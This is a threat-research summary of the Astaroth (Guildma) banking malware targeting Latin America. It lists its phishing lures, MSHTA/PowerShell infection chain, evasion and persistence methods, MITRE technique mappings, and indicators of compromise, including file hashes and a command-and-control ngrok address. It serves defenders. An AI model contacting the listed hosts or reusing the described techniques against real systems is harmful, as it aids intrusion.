Threat Research

Astaroth unleashed

Acronis

Astaroth, or Guildma, is a sophisticated malware that has evolved since its emergence in 2018, predominantly affecting systems in Latin America, especially Brazil. The malware employs advanced techniques to evade detection and uses phishing methods to deliver its payload. It targets multiple industries with a significant focus on manufacturing, IT, and financial services. Recent innovations in its execution and evasion strategies highlight the constant adaptation of its authors. Affected: Brazil, Mexico, Argentina, Manufacturing, IT, Financial Services, Health Care

Keypoints :

  • Astaroth malware targets primarily Latin America, with 91% of affected systems in Brazil.
  • It leverages phishing schemes with themes relevant to its targeted audience, such as tax declarations and accounting documents.
  • The initial infection method utilizes MSHTA to execute JavaScript for further malicious downloads.
  • Employs methods to evade security technologies, such as anti-debugging and geolocation checks.
  • Recent campaigns have utilized spoofed DocuSign emails to trick users.
  • Complex infection chains involve multiple stages of downloading and executing malicious files.
  • The malware creates persistent backdoors on infected systems through LNK files in Startup directories.
  • Utilizes multiple layers of obfuscation and string encryption to hinder analysis.
  • Targets include various industries, with manufacturing being the most affected sector (27%).
  • Deployment and infection processes are increasingly sophisticated, indicating ongoing evolution.

MITRE Techniques :

  • T1203: Exploitation for Client Execution – Astaroth employs MSHTA to execute malicious JavaScript code.
  • T1071: Application Layer Protocol – Uses HTTP/HTTPS for command and control communications with its payload.
  • T1105: Ingress Tool Transfer – Downloads malicious scripts from remote servers based on geolocation conditions.
  • T1059: Command and Scripting Interpreter – Utilizes PowerShell to execute commands and download the payload.
  • T1027: Obfuscated Files or Information – Implements various techniques, including encoding and script obfuscation, to conceal its activities.
  • T1497: Virtualization/Sandbox Evasion – Checks for specific processes and volume serial numbers to detect sandbox environments.

Indicator of Compromise :

  • MD5: 62acdb0765cf0a73bd4fedf7f11c3512
  • MD5: 86517ea3d3ae9767f654bd417e990b1f
  • MD5: dece8b727fab19363beb8624a98b4c98
  • URL: tcp.sa.ngrok.io:20262
  • URL: hxxps://i.postimg.cc/fRnxLLCy/destacada-paisagens2.jpg

Full Story: https://www.acronis.com/en-us/cyber-protection-center/posts/astaroth-unleashed/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint